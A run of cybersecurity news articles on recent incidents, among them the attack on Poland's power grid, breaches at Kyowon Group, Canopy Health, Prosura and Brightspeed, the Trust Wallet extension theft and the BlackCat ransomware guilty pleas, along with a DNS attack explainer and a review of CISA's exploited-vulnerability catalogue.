1. Redefining Cyber Resilience as a Leadership Imperative: The need of the hour is resilience, and it should start from the top management itself to foster leadership commitment and shared responsibility for bringing in a positive mindset, investing in better cybersecurity tools and service providers that enable patient safety.
2. Empower People, Not Just Systems: Resilience is not built by technology; it is to be instilled within us, and human awareness is the best barrier. Each staff member, from the frontend IT administrators to nurses, is an integral part of ensuring the organization's integrity and patients' safety. Periodically conducting simulations, awareness campaigns, and real-world readiness drills will be necessary to make security a shared responsibility rather than an isolated function.
3. Establish a Culture of Collaboration: Threats don’t operate in isolation, and neither should our defense. Leaders must champion collaboration across hospitals, vendors, industry groups, and public-sector bodies. Proactive threat intelligence sharing and coordinated response frameworks enable healthcare organizations to anticipate disruptions rather than merely react. True resilience is never built in isolation; rather, it is forged through partnership.

The Way Forward: Resilience as the Heartbeat of Healthcare

Healthcare no longer remains confined to hospital premises. It has gone much beyond the walls of any hospital. Every network and every device that carries the patient's record or clinical data must be protected in today's connected world. It is more about constant trust rather than a one-time effort or technical achievement. Being resilient, even in the face of system failure, without compromising patient care, is vital. As for 2026, organizations would have to balance innovation with integrity and treat cybersecurity not just as a compliance checklist but as a shared responsibility to prioritize patient health and data. Integrating AI into cybersecurity practice will further help strengthen threat detection and response by identifying threats and containing them even before they strike. The future of health is not defined by how sophisticated AI will become but by how well it is integrated into every layer of care. Resilience will come from AI-powered systems that protect patient data, strengthen clinical operations, and make sure the promise of technology truly supports the promise of healing.

Poland narrowly avoided a nationwide power outage at the end of December after what senior officials have described as the most serious cyberattack on its energy infrastructure in years. The Poland cyberattack occurred during a period of severe winter weather, further complicating the crisis management efforts.  In an interview on RMF FM, Minister of Digital Affairs Krzysztof Gawkowski warned that the threat was no longer hypothetical. “The digital tanks are already here,” he said, referring to the growing use of cyber tools as weapons. According to Gawkowski, the Polish cyberattack was aimed directly at cutting off electricity to citizens in the final days of December. “We were very close to a blackout,” he admitted.  The situation was particularly challenging because the attacks coincided with harsh weather conditions, which further strained the energy system. Despite these factors, authorities managed to stabilize the network before power supplies were interrupted on a large scale. 

Russian Sabotage and the Scale of the Poland Cyberattack 

Krzysztof Gawkowski noted that the government views the incident as a deliberate sabotage rather than a random hacking attempt. “Everything suggests that we are dealing with Russian sabotage—because it has to be called by its name—which was intended to destabilize the situation in Poland,” he said during the RMF FM broadcast. He described the operation as the largest cyberattack on Poland’s energy infrastructure in years, with a clear objective of triggering a blackout.  [caption id="attachment_108679" align="alignnone" width="662"] Krzysztof Gawkowski Speaks on the Poland cyberattack (Source: RMF)[/caption] While stressing over the seriousness of the Poland cyberattack, Gawkowski also sought to reassure the public. “There is no need to panic,” he said, adding that state institutions were well prepared to respond and had acted effectively to prevent the worst-case scenario.  Additional details were provided earlier by Energy Minister Miłosz Motyka, who said that hackers attempted to breach multiple electricity-producing facilities across the country. The targets included one combined heat and power plant as well as numerous individual renewable energy sources. Motyka described the incident as unprecedented in its coordination.   “We have not experienced an attack like this before,” he said. “For the first time, various locations were targeted simultaneously.” According to the minister, the attack was successfully countered before it could cause lasting damage. 

Strengthening Defenses Against Future Attacks 

Motyka characterized the Poland cyberattack as “threatening” and fundamentally different from previous incidents. In response, he announced that Poland would step up investment in its energy infrastructure this year. The government plans to implement an “anti-blackout package” focused on modernization and stronger cybersecurity protections to better defend against similar attacks in the future.  The cyberattack on Poland is part of a wider trend affecting institutions and companies across the European Union. In recent years, cyber operations attributed to Russian state-sponsored actors have increasingly targeted critical infrastructure, often described as elements of hybrid warfare aimed at destabilizing the EU and disrupting Western support for Ukraine, accusations that Moscow has denied.  Poland itself has faced a series of cyber incidents in recent months. In November, several attacks disrupted digital payment services, while a separate breach led to the leaking of customer login details from a Polish travel agency.  

Political Fallout Amid Rising Cyber Risks 

The broader implications of the Poland cyberattack have extended into the political arena. During his RMF FM interview, Krzysztof Gawkowski was asked whether technical problems that delayed the leadership election of the Poland 2050 party could also be linked to cyber activity. The vote was not resolved on Monday “for technical reasons,” raising speculation about possible interference.  Gawkowski said he had no direct knowledge connecting the issue to the wider cyberattack on Poland but confirmed that the matter had been reported to the Internal Security Agency. “There will be a review. I’m not ruling out any scenario,” he said. He added that the party itself might have more information, noting, “The services will investigate, but what happened there? I don’t know. This is definitely a problem for Poland 2050.”  The minister also addressed other digital policy issues, including the president’s veto of a digital bill over concerns about online censorship. Gawkowski said he was willing to meet with Karol Nawrocki to discuss the legislation, describing the veto as political in nature and criticizing the narrative that content removal automatically constitutes an attack on freedom of speech. 

In 2026, when websites, apps, and online services drive nearly every aspect of daily life, the Domain Name System (DNS) acts as the internet’s unsung hero. It serves as the bridge between humans and machines, effortlessly translating memorable domain names like www.thecyberexpress.com, the same website you’re reading this article on.   But this crucial system is also a prime target for cybercriminals. A DNS attack can disrupt services, steal sensitive data, or redirect users to malicious websites. Understanding what is a DNS attack, its types of DNS attacks, and the vulnerabilities it exploits is essential for securing networks and cloud environments. 

Understanding DNS Threats 

A DNS attack is any attempt to exploit vulnerabilities in the Domain Name System to disrupt normal operations, manipulate traffic, or gain unauthorized access. DNS is inherently designed for accessibility rather than security, which makes it susceptible to DNS threats. Attackers exploit the fact that DNS communications are often unencrypted, allowing them to intercept, alter, or redirect traffic.  In recent research, the economic impact of DNS attacks continues to strain organizational cybersecurity budgets. According to the 2023 Global DNS Threat Report by IDC, 88% of surveyed organizations reported experiencing at least one DNS attack, and most suffered multiple incidents annually. The study found that these attacks impose an average cost of approximately $942,000 per successful breach, as well as operational disruption and reputational harm.   DNS attacks are not limited to traditional web browsing; they can target internal networks, cloud-hosted DNS services, and enterprise infrastructure. A recent example occurred on January 8, 2026, when a global DNS attack caused Cisco Small Business Switches to enter repeated reboot loops. Faults in the DNS client service triggered crashes across multiple models, from CBS250 to SG550X series, affecting organizations worldwide. In many cases, disabling DNS queries temporarily stabilized networks, highlighting how dependent infrastructure can be on proper DNS functionality. 

How DNS Attacks Work 

A DNS attack typically exploits a DNS vulnerability to manipulate traffic or disrupt service. Attackers can: 

• Intercept DNS queries and provide malicious responses. 
• Redirect users to fraudulent websites for phishing or malware distribution. 
• Overload DNS servers to cause downtime through DNS DDoS attacks. 
• Exploit caching mechanisms to redirect legitimate traffic (DNS poisoning). 

In technical terms, attackers may spoof a DNS request source address. When the server responds, the data is sent to the target rather than the requester. This can allow unauthorized access, website downtime, or network compromise. In cloud environments, where DNS maps Fully Qualified Domain Names (FQDNs) to virtual machines or hosted zones, a successful DNS attack can disrupt services and expose sensitive data. 

Common DNS Attack Types 

DNS attacks come in many forms, ranging from simple hijacks to multi-vector campaigns. Understanding these types of DNS attacks is crucial for prevention.

• DNS Hijacking: Attackers redirect legitimate traffic to malicious sites by altering DNS records. This can occur through compromised servers or man-in-the-middle interception, leading to data theft or malware infections.
• DNS Cache Poisoning: Also known as DNS poisoning, this attack injects false data into a DNS resolver’s cache, causing it to return incorrect IP addresses. Users unknowingly visit attacker-controlled sites. 
• DNS Floodand DDoS Attacks: A DNS flood is a denial-of-service attack that overwhelms servers with excessive requests. DNS DDoS attack types often combine spoofing and amplification techniques to maximize disruption, targeting both authoritative servers and resolvers.
• DNS Tunneling: Here, attackers encapsulate malicious data within DNS queries or responses, often to exfiltrate sensitive information or maintain command-and-control channels undetected.
• Phantom Domain and Botnet-Based Attacks: Attackers may generate fake domains to overload resolvers or use a network of compromised devices to launch coordinated attacks. These DNS-based attacks are challenging to defend against due to their distributed nature.
• Cover and Malware Attacks: Some attacks manipulate DNS as a distraction, enabling other attacks to succeed. Others directly use DNS viruses or malware to disrupt network services. 

Preventing DNS Attacks 

Defending against DNS attacks requires both proactive monitoring and strategic configuration: 

• Audit DNS zones regularly to remove outdated or vulnerable entries. 
• Keep DNS servers updated with the latest security patches. 
• Restrict zone transfers to prevent unauthorized access. 
• Disable DNS recursion on authoritative servers to prevent amplification attacks. 
• Implement DNSSEC to add digital signatures to DNS data, mitigating spoofing. 
• Use threat prevention tools and DNS firewalls to block malicious domains and detect exfiltration attempts. 

In cloud environments, organizations must also secure DNS by controlling traffic with security groups and access control lists (ACLs). Cloud providers manage the infrastructure, but customers are responsible for their configuration, including zones, records, and administrative access. 

Conclusion 

A DNS attack is a potent threat that exploits the vulnerabilities of the Domain Name System to disrupt services, steal data, or redirect traffic. With common DNS attacks such as hijacking, cache poisoning, DNS floods, and tunneling, organizations must prioritize DNS security. Understanding DNS vulnerabilities, implementing preventive measures, and monitoring traffic continuously are essential for protecting both local networks and cloud infrastructure from Internet DNS attacks. 

A Kyowon Group cyberattack has just been revealed, making the incident one of the latest breaches affecting South Korean companies in recent weeks. Amid ongoing investigations into breaches at companies such as KT, the country’s three major telecommunications firms, and Lotte Card, the Kyowon Group cyberattack has raised concerns due to the company’s extensive customer base across its many subsidiaries.  According to the latest updates on its website, Kyowon Group detected signs of an external intrusion on the morning of January 10. After identifying abnormal activity, the company immediately shut down parts of its internal systems and began emergency recovery measures. The incident was publicly acknowledged on January 11, when access to Kyowon Group’s main website and several affiliated sites became unavailable. 

Systems Shut Down After the Kyowon Group Cyberattack  

As of January 12, a service disruption notice was displayed across Kyowon Group and subsidiary websites, stating, “Web service is unavailable due to unexpected disruptions.” At that time, users were still unable to access online services, indicating the impact of the Kyowon Group cyberattack was ongoing.  [caption id="attachment_108477" align="alignnone" width="807"] Kyowon Group alerts users to a cyberattack on its systems (Source: Kyowon Group)[/caption] A Kyowon Group representative confirmed the breach, stating, “We have confirmed indications of a breach,” while emphasizing that investigations were still underway. The representative added, “We are still investigating whether any personal information has been leaked.” The company also announced that it planned to release an official statement the following morning once more details were confirmed. 

Multiple Affiliate Websites Go Offline as Recovery Efforts Continue 

Further disclosures revealed that Kyowon Group believes the incident may be linked to ransomware activity. On Monday, the company said it had shut down parts of its internal network after detecting what it described as suspicious behavior consistent with a ransomware attack. Kyowon Group explained that abnormal activity was first identified at approximately 8 a.m. on Saturday, January 10, prompting immediate action to isolate affected systems and block external access.  Several websites operated by Kyowon Group affiliates remained inaccessible as of Monday. A notice on the Kyowon Tour website confirmed that the service was unavailable. These disruptions highlighted the broad operational impact of the Kyowon Group hacking incident, which affected multiple brands under the group’s umbrella.  Kyowon Group reported the suspected breach to the Korea Internet & Security Agency (KISA) and relevant investigative authorities shortly after identifying the issue. The company said it is currently restoring systems while conducting comprehensive security checks to determine the scope of the intrusion. 

Company Reports Incident to Authorities, Probes Possible Ransomware Involvement 

“We are working with professional security personnel and related agencies to conduct a detailed investigation into the cause of the breach, the scope of its impact, and whether any data was affected, while carrying out recovery work,” Kyowon Group said in an official statement. The company also addressed concerns over customer data, stating, “We are also checking whether any personal information was leaked. If a leak is confirmed, we will promptly and transparently notify customers in accordance with relevant laws and procedures.”  Kyowon Group added that it plans to gradually restore access to its websites and related services as systems are secured. “We will mobilize all available resources to stabilize services and prioritize customer protection as we work toward full recovery,” the company said.  The cyberattack on Kyowon Group is particularly important given the group’s diverse business portfolio and large customer base. Kyowon Group operates education-focused brands such as Kyowon Kumon and Red Pen, which provide after-school learning materials. It also runs lifestyle and service-oriented businesses, including the Wells home appliance brand, Kyowon Life, a funeral service company, Kyowon Invest, Kyowon Travel, The Suites Hotel, and Kyowon Tour. 

Canopy Health confirms it suffered a serious cyber intrusion that went undisclosed to patients for six months. The delayed notification has triggered anger and deep concern among those affected, many of whom say the Canopy Health data breach has eroded their confidence in health providers and the systems meant to protect sensitive personal information.  The Canopy Health cyberattack was publicly acknowledged this week after months of behind-the-scenes investigation. In an update posted on its website, Canopy Health said it identified the incident on 18 July 2025, when it detected that an unknown person had “temporarily obtained unauthorized access” to part of its internal systems used by its administration team.  Following a forensic investigation conducted by external cybersecurity experts, the organization said it had been advised that “unauthorized access to one of our servers likely occurred, and some data may have been copied.” Canopy Health added that the incident had since been contained, but confirmed the investigation was ongoing. 

Patients React to the Canopy Health Data Breach 

According to Radio New Zealand, a woman who requested anonymity said she only learned about the Canopy Health data breach after receiving an email from the company this week. “Six months is an outrageous amount of time to keep the breach secret,” she said.  She had previously been referred to one of Canopy Health’s clinics for mammograms under the government-funded national breast screening program, BreastScreen Aotearoa, and had also used its diagnostic imaging services. The woman said the email she received claimed there was “no indication that any credit card, banking information or identity documents were affected.” However, she noted this appeared to contradict Canopy Health’s website statement, which acknowledged hackers may have “accessed a small number of bank account numbers.”  The woman, who is also a user of the Manage My Health platform, said that beyond what she described as “obviously inadequate data security systems,” the slow and unclear communication from both companies was “completely unacceptable.” “I am angry, and my confidence in health services and data security in this country is at an all-time low,” she said. 

Concerns Over Financial and Identity Information 

Another Auckland resident, also granted anonymity by RNZ, said she was referred to Canopy Health for a mammogram through BreastScreen Aotearoa and only received a letter about the breach in mid-December. “It was definitely not acceptable that this happened in July, but I only received a letter months later,” she said. “I would never have known if they had not sent that letter. But in the period of time they’ve taken to send it to me, anything could have happened.”  She said she was not reassured by Canopy Health’s assertion that it was “unlikely” patients’ identities were at risk. “If any of my information were compromised in any way, it would affect me,” she said. “I don’t know what would be out there, especially with the job I do—what if it fell into the hands of the wrong person and was used against me?”  Under a Q&A section published on its website, Canopy Health said the hacker “may have accessed a small number of bank account numbers, which had been provided to Canopy for payment or refund purposes.” The company said it was “directly notifying potentially affected individuals” and added that it was “unlikely the threat actor can take significant action with these details, as sensitive bank account information is highly protected.” Patients concerned about the Canopy Health data breach were advised to contact their banks. 

Second Health Data Incident Raises Wider Questions 

The Canopy Health cyberattack comes amid heightened scrutiny of data security in the health sector. In late December, patient portal provider Manage My Health confirmed it had identified a separate security incident involving unauthorized access to its platform. The company said between 6 and 7 percent of its approximately 1.8 million registered users may have been affected.  Manage My Health later said more than half of impacted patients had received notification emails, and that unaffected users could see their status within the app. Of the roughly 125,000 patients affected by the ransomware attack, more than 80,000 are based in Northland—the only region where Health NZ uses Manage My Health to share hospital discharge summaries, outpatient clinic letters, and referral notifications with patients.  The operators of Manage My Health said they have received “independent confirmation” from IT experts that vulnerabilities in its code have now been fixed. Meanwhile, the fallout from the Canopy Health data breach and the broader Canopy Health cyberattack continues to raise serious questions about transparency, accountability, and the protection of patient data across the healthcare system. 

Australian insurance provider Prosura is investigating a cyber incident after detecting unauthorized access to parts of its internal systems, which has resulted in fraudulent emails being sent to some customers. The Prosura cyberattack, identified in early January, led the insurer to temporarily shut down key online services while it works to secure its systems and determine the full extent of the breach.  Prosura confirmed that it first identified the cyberattack on Prosura on January 3, 2026. In a media statement, the company said it discovered “unauthorized access to parts of our systems” and acted immediately to limit further risk.  “As a precaution, we have temporarily disabled the ability to purchase a policy, submit or manage a claim, or administer an existing policy via our self-service portal while we investigate and secure our environment,” Prosura said.  A subsequent Security Incident Update issued on Thursday, 8 January, provided additional clarity. According to the insurance provider, an unknown third party gained unauthorized access to a portion of its internal IT systems. Prosura also acknowledged that it was aware of online activity related to the incident and was prioritizing efforts to verify those claims.  While services remain offline, Prosura said it is conducting an urgent review of its systems and deploying additional security measures to prevent a recurrence of the Prosura cyberattack. 

Fraudulent Emails Linked to the Prosura Cyberattack

Alongside the system intrusion, Prosura reported that some customers received fraudulent emails connected to their existing or completed policies. These messages may reference the cyberattack on Prosura and instruct recipients to contact a third-party email address. The insurer urged customers not to respond to these emails, not to contact any external addresses mentioned, and to avoid clicking on links or opening attachments in unexpected messages. Customers were also advised to remain alert to phishing attempts via email, phone calls, or text messages that may use personal information to appear legitimate.

Customer Information Potentially Impacted 

Based on its investigation so far, Prosura believes some customer data may have been accessed during the cyberattack. The information potentially affected includes names, email addresses, phone numbers, country of residence, travel destinations, invoicing and pricing details, as well as policy start and end dates.  For customers who have previously made claims, the breach may also have exposed additional claim-related information. This could include driver’s licenses and associated images that were submitted as part of supporting documentation.  Prosura noted that there is no evidence that payment data was compromised. “Importantly, there is no indication that payment information (including credit card details) have been accessed,” the company stated, adding that it does not store credit card details within its systems. 

Regulatory Notifications and Ongoing Response 

The insurance provider confirmed it has notified both the Australian Cyber Security Centre and the Office of the Australian Information Commissioner, and will alert other regulatory bodies as required. Prosura is also working with external cybersecurity specialists to investigate what happened, strengthen system security, and monitor for further developments.  “We are taking this incident extremely seriously. We will work with specialist cybersecurity experts to investigate what happened, secure our systems, and restore services safely,” the company said.  Despite the disruption, Prosura reassured customers that active policies remain valid. Policyholders with upcoming travel plans were advised that they can proceed as planned, as policy validity has not been affected by the incident. Customers needing claim support were instructed to contact Prosura directly via its official support email with “Claim” included in the subject line. 

Company Apology and Next Steps 

In a statement signed by Managing Director Mike Boyd, Prosura acknowledged the concern caused by the incident. “We know this is concerning, and we are sorry this has happened,” Boyd said. “Our focus is on protecting our customers, supporting those affected, and restoring services safely.”  Prosura said it will contact impacted parties directly once it confirms what information was involved and will provide further guidance and support as required. The company added that it will continue to issue updates as new facts emerge, noting that premature disclosures could lead to misinformation.  As the Prosura cyberattack investigation continues, the insurer has reiterated its advice for customers to stay vigilant, avoid suspicious communications, and rely only on official updates published through Prosura’s website and direct customer communications. 

The hacking group Crimson Collective claims to have access to Brightspeed’s infrastructure and is disconnecting users from the company’s home internet services. The group made its latest claims in a post on Telegram yesterday. “Hey BrightSpeed, we disconnected alot of your users home internet.. they might be complaining you should check,” the Telegram post says. Asked by The Cyber Express how the group was able to do this, a Crimson Collective spokesperson replied, “we were able to do this with the access we had on their infrastructure,” suggesting that the extent of the claimed breach may go beyond customer data access. The Cyber Express reached out to Brightspeed to see if the company could confirm or deny Crimson Collective’s claims and will update this article with any response. So far the company has said only that it is “investigating reports of a cybersecurity event,” so any claims by the hacker group remain unconfirmed.

Crimson Collective’s Brightspeed Claims and Customer Risk

In a January 4 Telegram post, Crimson Collective claimed that the group had breached Brightspeed and obtained the personal data of more than a million residential customers of the U.S. fiber broadband provider. A day later, the threat group released a data sample to back up those claims. The group is also trying to sell the data, suggesting that any negotiations that may have taken place with Brightspeed had failed to progress. Crimson Collective claims to possess a wide range of data on Brightspeed customers, including names, email addresses, phone numbers, billing and service addresses, account status, network type, service instances, network assignments, IP addresses, latitude and longitude coordinates, payment history, payment card types and masked card numbers (last 4 digits), expiry dates, bank identification numbers (BINs), appointment and order records, and more. The data doesn’t include password or full credit card numbers that could put users at imminent risk of breach or theft, but the hacker group told The Cyber Express that “Every PII is important, with all this data people can easily start big sophisticated phishing campaigns or even get access to specific people's infrastructure.” Noelle Murata, Senior Security Engineer at Xcape, agreed that the data holds potential value for cybercriminals. “The stolen data reportedly includes payment card details and account histories that create opportunities for identity theft and sophisticated social engineering scams and are particularly dangerous when targeting a demographic that may be less digitally savvy,” Murata said in a statement shared with The Cyber Express.

Crimson Collective: An Emerging Threat

Crimson Collective first emerged last year with a Red Hat GitLab breach that exposed client Customer Engagement Reports (CERs) and other potentially sensitive data about client infrastructure. Murata said the Brightspeed attack “aligns with the Crimson Collective's pattern of exploiting cloud misconfigurations and leaked AWS credentials to bypass security measures.” The timing of the attack, coming just after the New Year holiday, is a possible example of "holiday hunting," where cybercriminals exploit reduced IT staffing over holidays, Murata said. “Service providers in rural and suburban areas often operate with limited security resources but face the same threats as larger urban carriers,” Murata said. “Transparency, prompt customer notification, and immediate containment will be crucial in the coming days.”

We don’t have many details:

President Donald Trump suggested Saturday that the U.S. used cyberattacks or other technical capabilities to cut power off in Caracas during strikes on the Venezuelan capital that led to the capture of Venezuelan President Nicolás Maduro.

If true, it would mark one of the most public uses of U.S. cyber power against another nation in recent memory. These operations are typically highly classified, and the U.S. is considered one of the most advanced nations in cyberspace operations globally.

A UK school cyberattack has forced a British secondary school to close its doors at the start of the new term, highlighting ongoing cybersecurity challenges across the education sector. Higham Lane School in Nuneaton, central England, confirmed that a cyber incident has disrupted its entire IT infrastructure, preventing students and staff from accessing essential digital services. The Higham Lane School cyberattack incident has left the school’s approximately 1,500 students unable to return to classrooms following the Christmas holidays. School officials confirmed that the campus will remain closed until at least Wednesday while investigations and recovery efforts continue.

Higham Lane School Cyber Incident Disrupts IT Systems

In an email sent to parents and carers, Higham Lane School stated that the cyberattack “has taken down the school IT system,” leaving staff without access to “any digital services including telephones / emails / servers and the school’s management system.” The outage has affected all internal communications and administrative functions, prompting school leaders to take the precautionary step of closing the site. Headteacher Michael Gannon detailed the situation in a formal letter to families, explaining the steps being taken to manage the incident. “We are writing to provide you with an update following the recent cyber incident that has affected our school,” the letter stated. “As you are aware, the school will be closed today, Monday 5th January, and will remain closed tomorrow, Tuesday 6th January, while we continue to respond to this situation.” The decision, according to the school, was made following advice from external experts. Higham Lane School is working with a Cyber Incident Response Team from the Department for Education, alongside IT specialists from its Multi Academy Trust, the Central England Academy Trust, to investigate and resolve the issue.

UK School Cyberattack: Students Advised Not to Access School Systems

As part of the response to the school IT system outage, staff and students have been instructed not to log into any school platforms, including Google Classroom and SharePoint, until further notice. The school emphasized that students who may have already accessed systems using their credentials should not worry, but added that the temporary restriction is necessary to ensure safety while the investigation continues. Despite the closure, students have been encouraged to continue learning independently using external platforms not connected to the school network. Resources such as BBC Bitesize and Oak National Academy were recommended, with the school noting that these services can be accessed safely using personal devices and home internet connections.

Education Sector Cybersecurity Under Growing Pressure

The Higham Lane School cyber incident comes amid rising concern over cybersecurity in schools, both in the UK and internationally. In October 2025, Kearney Public Schools (KPS) in the United States disclosed a cybersecurity incident that compromised its entire technology network, affecting phones, computers, and digital systems district-wide. The KPS cyberattack disrupted communications as students and staff prepared to return to classrooms, requiring support from external cybersecurity experts. In the UK, recent findings from the Information Commissioner’s Office (ICO) have drawn attention to another emerging risk: student-led insider cyber incidents. According to the regulator’s analysis of 215 personal data breach reports in the education sector, 57% of insider incidents over the past two years were linked to students. Nearly a third involved stolen login credentials, and in 97% of those cases, students were responsible. “It’s important that we understand the next generation’s interests and motivations in the online world to ensure children remain on the right side of the law,” said Heather Toomey, Principal Cyber Specialist at the ICO. She warned that behavior driven by curiosity or dares can escalate into serious cyber incidents, with potential consequences extending beyond school systems.

Weak Security Controls Amplify Risks

The ICO cited several cases where weak password practices, poor access controls, and limited monitoring created opportunities for misuse. In one secondary school, Year 11 students accessed sensitive data belonging to 1,400 pupils after cracking staff passwords. In another case, a student used a compromised staff login to alter and delete records for more than 9,000 individuals. As investigations continue at Higham Lane School, the UK school cyberattack incident serves as another reminder of the growing importance of education sector cybersecurity, particularly as schools remain heavily reliant on digital platforms for teaching, administration, and communication.

After stabilizing in 2024, the growth of known exploited vulnerabilities accelerated in 2025. That was one conclusion from Cyble’s analysis of CISA’s Known Exploited Vulnerability (KEV) catalog data from 2025. After growing at roughly 21% in 2023, with 187 vulnerabilities added to the CISA KEV catalog that year, growth slowed to about 17% in 2024, with 185 vulnerabilities added. Growth in exploited vulnerabilities reaccelerated in 2025, with 245 vulnerabilities added to the KEV database, for a roughly 20% growth rate. The KEV catalog ended 2025 with 1,484 software and hardware flaws at high risk of attack. The 245 flaws added in 2025 is also more than 30% above the trend of 185 to 187 vulnerabilities added the previous two years. Cyble also examined vulnerabilities exploited by ransomware groups, the vendors and projects with the most KEV additions (and several that actually improved), and the most common exploited software weaknesses (CWEs).

Older Vulnerabilities Added to CISA KEV Also Grew

Older vulnerabilities added to the CISA KEV catalog also grew in 2025, Cyble said. After adding an average of 65 older vulnerabilities to the KEV catalog in 2023 and 2024, CISA added 94 vulnerabilities from 2024 and earlier to the catalog in 2025, an increase of nearly 45% from the 2023-2024 average. The oldest vulnerability added to the KEV catalog last year was CVE-2007-0671, a Microsoft Office Excel Remote Code Execution vulnerability. The oldest vulnerability in the catalog remains CVE-2002-0367, a privilege escalation vulnerability in the Windows NT and Windows 2000 smss.exe debugging subsystem that has been known to be used by ransomware groups, Cyble said. CISA removed at least one vulnerability from the KEV catalog in 2025. CVE-2025-6264 is a Velociraptor Incorrect Default Permissions vulnerability that CISA determined had “insufficient evidence of exploitation,” Cyble noted.

Vulnerabilities Targeted in Ransomware Attacks

CISA marked 24 of the vulnerabilities added in 2025 as known to be exploited by ransomware groups, Cyble said. Those vulnerabilities include some well-known flaws such as CVE-2025-5777 (dubbed “CitrixBleed 2”) and Oracle E-Business Suite vulnerabilities targeted by the CL0P ransomware group. Vendors with multiple vulnerabilities targeted by ransomware groups included Fortinet, Ivanti, Microsoft, Mitel, Oracle and SonicWall.

Projects and Vendors with the Most Exploited Vulnerabilities

Microsoft once again led all vendors and projects in CISA KEV additions in 2025, with 39 vulnerabilities added to the database, up from 36 in 2024. Apple, Cisco, Google Chromium. Ivanti and Linux each had 7-9 vulnerabilities added to the KEV catalog. Several vendors and projects actually improved in 2025, with fewer vulnerabilities added than they had in 2024, “suggesting improved security controls,” Cyble said. Adobe, Android, Apache, Ivanti, Palo Alto Networks, and VMware were among those that saw a decline in KEV vulnerabilities.

Most Common Software Weaknesses

Eight software and hardware weaknesses (common weakness enumerations, or CWEs) were “particularly prominent among the 2025 KEV additions,” Cyble said, noting that the list is similar to the 2024 list. The most common CWEs in the 2025 CISA KEV additions were:

• CWE-78 – OS Command Injection – accounted for 18 of the 245 vulnerabilities.
• CWE-502 – Deserialization of Untrusted Data – was  a factor in 14 of the vulnerabilities.
• CWE-22 – Path Traversal – appeared 13 times.
• CWE-416 – Use After Free – was a flaw in 11 of the vulnerabilities.
• CWE-787 – Out-of-bounds Write – accounted for 10 of the vulnerabilities.
• CWE-79 – Cross-site Scripting – appeared 7 times.
• CWE-94 (Code Injection) and CWE-287 (Improper Authentication) appeared 6 times each.

 

Trust Wallet users had $8.5 million in crypto assets stolen in a cyberattack linked to the second wave of the Shai-Hulud npm supply chain attack. In a lengthy analysis of the attack, Trust Wallet said attackers used the Shai-Hulud attack to access Trust Wallet’s browser extension source code and Chrome Web Store API key. “Using that access, they were able to prepare a tampered version of the extension with a backdoor designed to collect users’ sensitive wallet data [and] releasing the malicious version to the Chrome Web Store using the leaked (CWS) API key,” the crypto wallet company said. So far Trust Wallet has identified 2,520 wallet addresses affected by the incident and drained by the attackers, totaling approximately $8.5 million in assets. The company said it “has decided to voluntarily reimburse the affected users.” News of the successful attack comes amid reports that threat actors are actively preparing for a third wave of Shai-Hulud attacks.

Trust Wallet Shai-Hulud Attack Detailed

Trust Wallet said “an unauthorized and malicious version” of its Browser Extension (version 2.68) was published to the Chrome Web Store on December 24, “outside of our standard release process (without mandatory review). This version contained malicious code that, when loaded, allowed the attacker to access sensitive wallet data and execute transactions without authorization.” The $8.5 million in assets were associated with 17 wallet addresses controlled by the attacker, but Trust Wallet said the attacker addresses “also drained wallet addresses NOT associated with Trust Wallet and this incident. We are actively tracking other wallet addresses that may have been impacted and will release updated numbers once we have confirmation.” The incident affects only Trust Wallet Browser Extension version 2.68 users who opened the extension and logged in during the affected period of December 24-26. It does not affect mobile app users, users of other Browser Extension versions, or Browser Extension v2.68 users who opened and logged in after December 26 at 11:00 UTC. “If you have received an app push via the Trust Wallet mobile app or you see a security incident banner on your Trust Wallet Browser Extension, you may still be using the compromised wallets,” the company said. Browser Extension v2.68 users who logged into their wallets during the affected period were advised to transfer their funds from any at-risk wallets to a newly created wallet following the company’s instructions and to submit reimbursement claims at https://be-support.trustwallet.com.

White Hat Researchers Limited Damage with DDoS Attacks

The dramatic Trust Wallet attack was met by an equally dramatic response from white hat security researchers, who launched DDoS attacks on the attacker to limit damage, as detailed in the company’s update. Trust Wallet’s Developer GitHub secrets were exposed in the November second-wave attack, which gave the attacker access to the browser extension source code and the API key, allowing builds to be uploaded directly without Trust Wallet's internal approval and manual review. The attacker registered the domain metrics-trustwallet.com “with the intention of hosting malicious code and embedding a reference to that code in their malicious deployment of the Trust Wallet Browser Extension,” the company said. The attacker prepared and uploaded a tampered version of the browser extension using the codebase of an earlier version that they had accessed through the exposed developer GitHub secrets. The attacker published version 2.68 on the Chrome Web Store for review using the leaked CWS key, “and the malicious version was released automatically upon passing Chrome Web Store review approval,” Trust Wallet said. On December 25, the first wallet-draining activity was publicly reported, when 0xAkinator and ZachXBT flagged the issues and identified the attacker's wallet addresses, and partner Hashdit and internal systems “notified us with multiple suspicious alerts.” “White-hat researchers initiated DDoS attacks in an attempt to temporarily disable the attacker's malicious domain, api.metrics-trustwallet.com, helping to minimize further victims,” Trust Wallet said. The company rolled back to a verified clean version (2.67, released as 2.69) and issued urgent upgrade instructions.

Two cybersecurity experts charged with deploying ALPHV BlackCat ransomware against five companies have pleaded guilty to federal charges in the case, the U.S. Department of Justice announced today. Ryan Goldberg, 40, of Georgia, and Kevin Martin, 36, of Texas, were indicted in the BlackCat ransomware case in October. Together with an unnamed co-conspirator, they “successfully deployed the ransomware known as ALPHV BlackCat between April 2023 and December 2023 against multiple victims located throughout the United States,” the Justice Department said today. The two face sentencing in March for conspiring to obstruct commerce through extortion.

Misusing ‘Trusted Access and Technical Skill’

Martin and the co-conspirator worked as ransomware negotiators for DigitalMint, a Chicago-based company that specializes in mitigating cyberattacks, while Goldberg was an incident response manager at Sygnia Cybersecurity Services. DigitalMint and Sygnia have publicly stated they were not targets of the investigation and have cooperated fully with law enforcement. “These defendants used their sophisticated cybersecurity training and experience to commit ransomware attacks — the very type of crime that they should have been working to stop,” stated Assistant Attorney General A. Tysen Duva of the Justice Department’s Criminal Division. “Goldberg and Martin used trusted access and technical skill to extort American victims and profit from digital coercion,” added U.S. Attorney Jason A. Reding Quiñones for the Southern District of Florida. “Their guilty pleas make clear that cybercriminals operating from within the United States will be found, prosecuted, and held to account.”

BlackCat Ransomware Case Netted More Than $1 million

According to the Justice Department, the three men agreed to pay the ALPHV BlackCat administrators a 20% share of any ransom payments they received in exchange for the ransomware and access to ALPHV BlackCat’s extortion platform. “After successfully extorting one victim for approximately $1.2 million in Bitcoin, the men split their 80% share of this ransom three ways and laundered the funds through various means,” the Justice Department said. The five unnamed victim companies targeted by the co-conspirators included:

• A medical device company based in Tampa, Florida
• A pharmaceutical company based in Maryland
• A doctor’s office based in California
• An engineering company based in California
• A drone manufacturer based in Virginia

